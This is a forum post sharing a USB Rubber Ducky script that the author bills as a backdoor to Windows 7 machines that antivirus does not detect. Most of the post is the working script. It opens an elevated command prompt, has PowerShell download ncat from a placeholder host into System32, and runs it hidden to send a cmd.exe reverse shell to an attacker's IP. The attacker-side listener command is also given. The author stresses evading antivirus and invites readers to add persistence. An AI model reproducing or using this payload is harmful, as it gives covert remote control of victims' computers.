Grimsoul Posted November 7, 2014 Share Posted November 7, 2014 Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!)So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging.After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs.So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all.For this attack , we download a copy of ncat on the victims machine and run it silently.You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here.ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background.The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (Picked up by norton though , sucks i know) VirusTotal netcat results Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window. - GrimsouL REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target. DELAY 1000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed. DELAY 1000 STRING a DELAY 200 REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it ENTER REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 700 REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe') ENTER REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB) DELAY 10000 ENTER REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background , we use a powershell argument to make it so. STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe' ENTER REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway STRING exit ENTER To run our listener on the attacker machine ncat -l <ATTACKER IP> -p <ATTACKER PORT> -v Quote Link to comment Share on other sites More sharing options...
Grimsoul Posted November 8, 2014 Author Share Posted November 8, 2014 This also works on x64 machines , unlike the base64 payload that uses a vb script. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.